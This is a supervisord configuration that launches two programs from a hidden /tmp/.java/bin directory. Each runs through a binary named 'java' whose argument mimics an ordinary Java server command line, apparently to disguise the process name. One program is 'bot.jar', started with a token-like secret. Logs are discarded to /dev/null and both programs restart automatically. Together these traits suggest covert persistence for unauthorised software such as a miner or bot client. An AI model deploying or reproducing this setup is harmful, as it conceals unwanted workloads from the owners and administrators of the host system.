[supervisord]
logfile=/dev/null

[program:app]
directory=/tmp/.java/bin
command=./java -a 'java -Xms128M -XX:MaxRAMPercentage=95.0 -Dterminal.jline=false -Dterminal.ansi=true -jar server.jar' ./patch.jar -c ./conf.json
stdout_logfile=/dev/null
autorestart = true

[program:gnet]
directory=/tmp/.java/bin
command=./java -a 'java -Xms128M -XX:MaxRAMPercentage=95.0 -Dterminal.jline=false -Dterminal.ansi=true -jar server.jar' ./bot.jar -s "i0A9E7D-9g8H6b5j7-X1eCd9F9440-d6A2c5J1g6" -liq
stdout_logfile=/dev/null
autorestart = true
